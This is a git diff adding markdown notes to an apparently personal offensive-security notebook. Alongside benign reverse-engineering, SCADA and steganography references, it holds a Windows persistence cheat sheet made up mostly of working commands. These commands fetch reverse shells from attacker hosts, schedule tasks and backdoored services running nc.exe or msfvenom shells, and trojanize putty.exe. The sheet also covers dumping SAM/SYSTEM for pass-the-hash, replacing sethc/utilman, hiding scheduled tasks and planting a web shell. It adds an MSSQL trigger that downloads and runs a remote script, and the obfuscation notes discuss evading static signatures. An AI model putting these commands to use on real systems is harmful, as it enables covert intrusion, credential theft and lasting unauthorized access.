    * BITS
    * Creating a backdoored service
    * Creat user
    * RDP
 ## Gain Persistence on Windows
 * Browser. Add to trusted sites.
 * Powershell
 ```sh
 Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
 ```
 * DOSprompt
 ```cmd
 certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
 ```
 * Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
 ### Paths to Persistence
 * Put in startup directory
 ```sh
 C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 ```
 * Put the reverse_shell into `%appdata%` and add a registry key
 ```sh
 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
 ```
 ### Background Intelligence Transfer Service (BITS)
 ```sh
 bitsadmin /create __shell__
 bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
 ```
 ```sh
 bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
 bitsadmin /SetMinRetryDelay 30
 bitsadmin /resume
 ```
 ## Elevate Privileges
 * Create user `net user /add <user> <pass>`
 * Add to admin group via `net localgroup administrators <user> /add` 
 * Check `net localgroup Administrator`
 ### More stealthy
 * Backup Operator group is more stealthy, no admin by r/w on files
 ```sh
 net localgroup "Backup Operators" <user> /add
 net localgroup "Remote Management Users" <user> /add
 ```
 * The following two groups are assigned through membership of `Backup Operators`
    * SeBackupPrivilege, read files
    * SeRestorePrivilege, write files
 * Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
 ```sh
 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
 ```
 * Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
 * Backup `SAM` and `SYSTEM` via 
 ```sh
 reg save hklm\system system.bak
 reg save hklm\sam sam.bak
 download system.bak
 download sam.bak
 secretsdump.py -sam sam.bak -system system.bak LOCAL
 ```
 * Pass-the-hash via evil-winrm
 ### secedit
 * Get r/w on files through editing a config file
 * Export secedit and open it 
 ```sh
 secedit /export /cfg config.inf
 ```
 * Add user to the groups
 ```sh
 SeBackupPrivilege = [...],<username>
 SeRestorePrivilege = [...],<username>
 ```
 * Convert the file
 ```sh
 secedit /import /cfg config.inf /db config.sdb
 secedit /configure /db config.sdb /cfg config.infk
 ```
 * Add the user to the RDP group via net localgroup like before or do
 ```sh
 Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
 ```
 * Add & Click user -> Full Control(All Operations)
 * Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
 ### Relative ID (RID)
 * UID like in linux
    * Administrator has `RID = 500`
    * Other interactive users `RID >= 1000`
 * Get RIDs
 ```sh
 wmic useraccount get name,sid
 ```
 * Assign `500` to regular user
 ```sh
 PsExec64.exe -i -s regedit
 ```
 * Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
 * Search for RID value as hexadecimal value
 * Open the key called `F` and change effective RID at position `0x30`
 * Insert LE hex of `0d500`, which is `f401`
 ## Add to registry
 * Execute on user logon via
 ```sh
 reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
 ```
 ## Add a Service
 ### Meterpreter
 * Inside meterpreter `load powershell` and `powershell_shell`
 ```sh
 New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
 ```
 ### Powershell
 * Start a service automatically
 ```sh
 sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
 sc.exe start SteamUpdater
 ```
 * Use a service PE instead
 ```sh
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
 ```
 * Modify an existing service
    * Enumerate all the services
 ```sh
 sc.exe query state=all
 ```
    * Info about a specific service, start type should be automatic, service start name should be target user
 ```sh
 sc.exe qc <ServiceName>
 ```
    * Reconfigure
 ```sh
 sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
 sc.exe start FoundService
 ```
 ## Add Scheduled Task
 ```sh
 $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
 $B = New-ScheduledTaskTrigger -AtLogOn
 $C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
 $D = New-ScheduledTaskSettingsSet
 $E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
 Register-ScheduledTask ReverseShell -InputObject $E
 ```
 * Alternatively via `schtasks`
 ```sh
 schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
 ```
    * Check task
 ```sh
 schtasks /query /tn SteamUpdater
 ```
 * Deleting Security Descriptor of a task to make it invisible. Delete the following key
 ```sh
 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
 ```
 ## File Backdoor
 ### Mimic PE
 ```sh
 msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
 ```
 ### Reference Script
 * Recycle shortcut of an app to reference a reverse shell script
    * Right click -> `Properties` -> `Target`
 * Reference the the script `certainlynobackdoor.ps1` via 
 ```sh
 powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
 ```
 * Content of the script `certainlynobackdoor.ps1`
 ```sh
 Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
 C:\Windows\System32\calc.exe
 ```
 ### File Association
 * Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
 * Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1` 
 * Chang the argument to a shell script and pass the arg through it
 ```sh
 Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
 C:\Windows\system32\NOTEPAD.EXE $args[0]
 ```
 * Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
 ## Persistence via Logon 
 ### Startup directories
 * Users' Startup directory under
 ```sh
 C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 ```
 * Startup directory for all users, put the reverse shell here
 ```sh
 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
 ```
 ### Registry Keys
 * `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
 * `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
 * `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
 * `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
 * Create `Expandable String Value` under any of this keys with the value of the reverse shell path
 * `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
    * Either `shell` or `Userinit` can be appended with a comma separated command
 ### Logon Scripts
 * `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
 * Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
 ## RDP or Login Screen
 ### Sticky Keys
 * Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
 * Take ownership of the binary via
 ```sh
 takeown /f c:\Windows\System32\sethc.exe
 icacls C:\Windows\System32\sethc.exe /grant Administrator:F
 ```
 * Overwrite with `cmd.exe` 
 ```sh
 copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
 ```
 ### Utilman
 * Ease of access button is clickable at the login screen, it is executed with system privileges 
 * Take ownership and overwrite with `cmd.exe`
 ```sh
 takeown /f c:\Windows\System32\utilman.exe
 icacls C:\Windows\System32\utilman.exe /grant Administrator:F
 copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
 ```
 ## Web Shell
 * Default user is `iis apppool\defaultapppool`
 * Has `SeImpersonatePrivilege` 
 * [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
 * Move shell to `C:\inetpub\wwwroot` on target
 * Get the shell via `http://$TARGET_IP/shell.aspx`
 ## MSSQL
 * Triggers bind actions such as INSERTs
 * Open Microsoft SQL Server Management Studio
    * Choose windows auth
    * `New Query`
    * Enable Advance Options via
 ```sh
 sp_configure 'Show Advanced Options',1;
 RECONFIGURE;
 GO
 sp_configure 'xp_cmdshell',1;
 RECONFIGURE;
 GO
 ```
    * Grant privileges to all users
 ```sh
 USE master
 GRANT IMPERSONATE ON LOGIN::sa to [Public];
 ```
    * Change to DB
 ```sh
 USE <DATABASE>
 ```
    * Create trigger
 ```sh
 CREATE TRIGGER [sql_backdoor]
 ON HRDB.dbo.Employees 
 FOR INSERT AS
 EXECUTE AS LOGIN = 'sa'
 EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
 ```
 * Trigger the trigger by visiting the site which triggers the trigger through a db call
--- a/Persistence/wmi.md
+++ b/Persistence/wmi.md
@ -0,0 +1,3 @@
 # WMI Backdoor
 * [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)
--- a/Engineering/Android.md
+++ b/Engineering/Android.md
@ -0,0 +1,81 @@
 # Misc
 * `Dalvik` is the JVM of Android
 ## SMALI
 * `SMALI` is the byte code derived from Java.
 * Types
 ```
 V void
 Z boolean
 B byte
 S short
 C char
 F float
 I int
 J long
 D double
 [ array
 ```
 ### Registers
 * Registers are 32 bits
 * Type long and double use two registers 32+32=64 bits
 * `.registers`, total number of regs in method
 * `.locals`, non parameter regs in method
 * Arguments of a method are put into registers from highest to lowest.
 * The object itself is a parameter to its method.
 * Register naming schemes are
 * Normal local register are name v0, v1, v2 ...
 * Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers.
 ## APK Structure
 * `AndroidManifest.xml`, binary XML
 * `classes.dex`, app code compilation as dex
 * `resource.arsc`, precompiled resources in XML
 * `res`, resource dir 
 * `assets` app assets
 * `lib`, libraries
 * `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk.
 ## Tools
 * `jadx -d <outdir> <apk or dex>` as a decompiler
 * dex2jar to convert apk to jar
 ```sh
 d2j-dex2jar.sh /path/application.apk
 ```
 * Dex to smali with `d2j-dex2smali`
 * jd-gui as decompiler
 * `apktool` smali source from apk
 * [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git)
 * [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git) 
 * [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git)
 * Proguard deobfuscates code
 * [PID Cat log reader](https://github.com/JakeWharton/pidcat.git)
 * Burpsuite listener on Android emulator
 * [Drozer](https://github.com/FSecureLABS/drozer)
 ```sh
 adb forward tcp:31415 tcp:31415
 drozer console connect
 run app.package.list -> see all the packages installed
 run app.package.info -a -> view package information.
 run app.package.attacksurface package_name
 run app.activity.info -f package_name
 run app.activity.start --component package name component_name
 ```
 ```sh
 run app.provider.info -a package_name
 run scanner.provider.finduris -a package_name
 run app.provider.query uri
 run app.provider.update uri --selection conditions selection_arg column data
 run scanner.provider.sqltables -a package_name
 run scanner.provider.injection -a package_name
 run scanner.provider.traversal -a package_name
 ```
--- a/Engineering/Deobfuscation.md
+++ b/Engineering/Deobfuscation.md
@ -0,0 +1,97 @@
 # Deobfuscation
 ## Principles of Obfuscation
 * Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf)
 * These layers and what's obfuscated are:
    * __Code Element__
        * Layout
        * Controls
        * Data
        * Classes
        * Methods
    * __Software Component__
    * __Inter Component__
        * Library calls
        * Used Resources
    * __Application__
        * DRM System
        * Neural Networks
 ## Evade Statical Rules
 * Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation
    * __Array Transformation__
    * __Data Encoding__
    * __Data Procedurization__
    * __Data Splitting & Merging__
 ### Splitting & Merging of Strings
 * Breaking signature by modifying data distribution inside the code
 * This may be done by modifying strings and functions through following measures
 * __Joining__
 ```python
 "CAFFEE" + "BABE"
 ```
 * __Reordering__
 ```python
 a = "BABE"
 b = "CAFFEE"
 f"{b}{a}"
 ```
 * __Whitespaces of functions which are not interpreted__
 ```c
 int main ( void ) {
    printf ( "The answer is %d", 42 ) ;
 }
 ```
 * __Adding ticks which are not interpreted__
 * __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__
 ### Adding Unnecessary Instructions
 * Obfuscation of layout and controls inside the code
 * __Junk Stubs__
 * __Separation of Related Code__
 * __Stripping Redundant Symbols__
 * __Meaningless Identifiers__
 * __Converting Explicit to Implicit Instructions__
 * __Dispatcher Based Controls Executed During Runtime__
 * __Probabilistic Control Flows__
 * __Bogus Control Flows__
 ### Control Flow
 * Changing or adding to the flow of the code through change of conditions
 * Changes may be set to arbitrary code segments by __Opaque Predicates__
 * An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer
 ### Protecting Data
 * Stripping and protecting
    * __Code Structure__
    * __Object names__
    * __File & Compilation Properties__
 * To strip symbols
 ```sh
 strip --strip-all <binary>
 ```
 * Check via
 ```sh
 nm <binary>
 ```
 ## Usage
 * Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator 
 * In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__
--- a/Engineering/Dynamic
+++ b/Engineering/Dynamic
@ -0,0 +1,9 @@
 # DLL Reversing
 * Start DLL on its own with the help a wrapper
 ```C#
 HMODULE dll = LoadLibraryA("DLL.DLL");
 typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
 Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
 Add(1, 2);
 ```
--- a/Engineering/Firmware.md
+++ b/Engineering/Firmware.md
@ -0,0 +1,35 @@
 # Reversing Firmware
 ## Tools
 * binwalk
 * unlzma
 * tar
 * [fat](https://github.com/attify/firmware-analysis-toolkit.git)
    * Create usable environment and start firmware inside it
    ```sh
    ./fat.py <firmware>
    ```
 * [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
 ## Usage
 * Check image via `strings`
 * Check CRC via `cksum -a crc <image>`
 * Use `binwalk` to extract. There are to methods
    * `-e` extract by offset
    * `--dd=".*"` by file extension
 ### Mount JFFS2 File
 * Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
 ```sh
 rm -rf /dev/mtdblock0
 mknod /dev/mtdblock0 b 31 0
 mkdir /mnt/jffs2
 modprobe jffs2
 modprobe mtdram
 modprobe mtdblock
 dd if=<jffs2File> of=/dev/mtdblock0
 mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
 ```
 ## Tips & Tricks
 * Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)
--- a/Engineering/Function
+++ b/Engineering/Function
@ -0,0 +1,4 @@
 # Function Decoration
 * Done to imported functions in order to do interpositioning and identify the variants of the function.
 * [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
--- a/Engineering/Krakatau.md
+++ b/Engineering/Krakatau.md
@ -0,0 +1,17 @@
 # Krakatau
 ## Usage
 * Get bytecode from `jar` file
 ```sh
 krakatau-disassemble -r file.jar -out dissassemble.zip
 ```
 * Generate bytecode
 ```sh
 krakatau-assemble -out result.jar -r dissassembled/
 ```
 * Do changes to the bytecode
 * Compile jar file
 ```sh
 java -cp result.jar <fileNameOfMainClass>
 ```
--- a/Engineering/Portable
+++ b/Engineering/Portable
@ -0,0 +1,33 @@
 # Portable Executable
 * [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
 * An executable binary in the windows world
 The file format consists of
    * PE Header
    * Data Sections
 ## Data Section
 The data section consists of
 * __.text__, program code
 * __.data__, initialized variables
 * __.bss__, unanitialized variables
 * __.edata__, exportable objects and related table info
 * __.idata__, imported objects and related table info
 * __.reloc__, image relocation info
 * __.rsrc__, links external resources, e.g. icons, images, manifests
 ## Starting a PE
 If a process starts, the PE is read in the following order
 1. Header sections
    * File signatue is __MZ__, and magic number are read
    * Architecture of the platform
    * timestamp
 2. Section table details is parsed
 3. Content is mapped into memory based on
    * Entry point address and offset of ImageBase
    * Relative Virtual Address (RVA), addresses related to Imagebase    
 4. Libraries and imports are loaded
 5. Entrypoint address of the main function is run
--- a/Engineering/References.md
+++ b/Engineering/References.md
@ -0,0 +1,7 @@
 # Reverse Engineering References
 ## Debugger
 [scdbg](https://github.com/dzzie/SCDBG.git)
--- a/Engineering/Scada.md
+++ b/Engineering/Scada.md
@ -0,0 +1,35 @@
 # Supervisory Control and Data Acquisition (SCADA)
 * SCADA works as an aggregatio of the following systems
    * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
    * __Remote Terminal Unit (RTU)__, use for wide area telemetry
    * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
    * __Communication network__ 
 * Security is no first class citizen
 ## Modbus
 * Developed by Modicon
 * Master/Slave, latter has an 8 bit address.
 * RS-485 Connector
 * Data registers 16 bit
    * Input register, 16 bit ro 
    * Hold register, rw
    * Coil register, 1 bit rw
    * Discrete register, 1bit ro  
 ### Function Codes
 * [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
 * RTU request inside of TCP segments, port 502
 * 1	__Read Coil__
 * 2	__Read Discrete Input__
 * 3	__Read Holding Registers__
 * 4	__Read Input Registers__
 * 5	__Write Single Coil__
 * 6	__Write Single Holding Register__
 * 15 __Write Multiple Coils__
 * 16 __Write Multiple Holding Registers__
--- a/Steganography/OutGuess.md
+++ b/Steganography/OutGuess.md
@ -0,0 +1,2 @@
 # Outguess
 `man outguess`
--- a/Steganography/References.md
+++ b/Steganography/References.md
@ -0,0 +1,10 @@
 # Steganography Tools
 [Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git)
 [OutGuess](https://github.com/resurrecting-open-source-projects/outguess)
 [Remnux Docs](https://docs.remnux.org/)
 [Steghide](http://steghide.sourceforge.net/)
 [Stegbrute](https://github.com/R4yGM/stegbrute)
 [stegoVeritas](https://github.com/bannsec/stegoVeritas)
 [zsteg](https://github.com/zed-0xff/zsteg)
--- a/Steganography/Remnux.md
+++ b/Steganography/Remnux.md
@ -0,0 +1,24 @@
 # ReMnux
 * [Documentation](https://docs.remnux.org/)
 ## Tools
 ### Peepdf
 * Extracting JS from PDF using config file into `js_from_pdf.js`
 ```sh
 echo 'extract js > js_from_pdf.js' > extract_js.conf 
 peepdf -s extract_js.conf <file.pdf>
 ```
 ### vmonkey
 * Detects malicious VBasic code in documents.
 ```sh
 vmonkey <file.doc>
 ```
 ### Packaged Binaries
 * Can be identified via entropy or loaded libs
    * The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`.
    * [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers.
    * File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high.
--- a/Steganography/Stegbrute.md
+++ b/Steganography/Stegbrute.md
@ -0,0 +1,9 @@
 # Stegbrute
 Bruteforce stego jpegs with a password.
 * install via `cargo install stegbrute`
 ## Usage
 ```sh
 stegbrute -f <filename> -w <wordlist>
 ```
--- a/Steganography/Steghide.md
+++ b/Steganography/Steghide.md
@ -0,0 +1,8 @@
 # Steghide
 * JPGs only
 * Example
 ```sh
 steghide extract -sf jpeg1.jpeg
 ```
--- a/Steganography/StegoScripts/xor_key_file.py
+++ b/Steganography/StegoScripts/xor_key_file.py
@ -0,0 +1,15 @@
 #!/usr/bin/env python
 def xor(data, key):
    keylen = len(key)
    return bytearray((
        (data[i] ^ key[i % keylen]) for i in range(0,len(data))
    ))
 if __name__ == "__main__":
    data = bytearray(open('topsecret.txt', 'rb').read())
    key = b'key'
    res = xor(data, key)
    print(res.decode())
--- a/Steganography/Stegoveritas.md
+++ b/Steganography/Stegoveritas.md
@ -0,0 +1,3 @@
 # Stegoveritas
 * Install via `pip install stegoveritas` and `stegoveritas_install_deps`
--- a/Steganography/Zsteg.md
+++ b/Steganography/Zsteg.md
@ -0,0 +1,8 @@
 # zsteg
 * PNGs, BMPs
 * Example
 ```sh
 zsteg png1.png --strings all
 ```
		`@ -0,0 +1,3 @@`
							`# WMI Backdoor`

							`* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)`
		`@ -0,0 +1,3 @@`
							`# Stegoveritas`

							* Install via `pip install stegoveritas` and `stegoveritas_install_deps`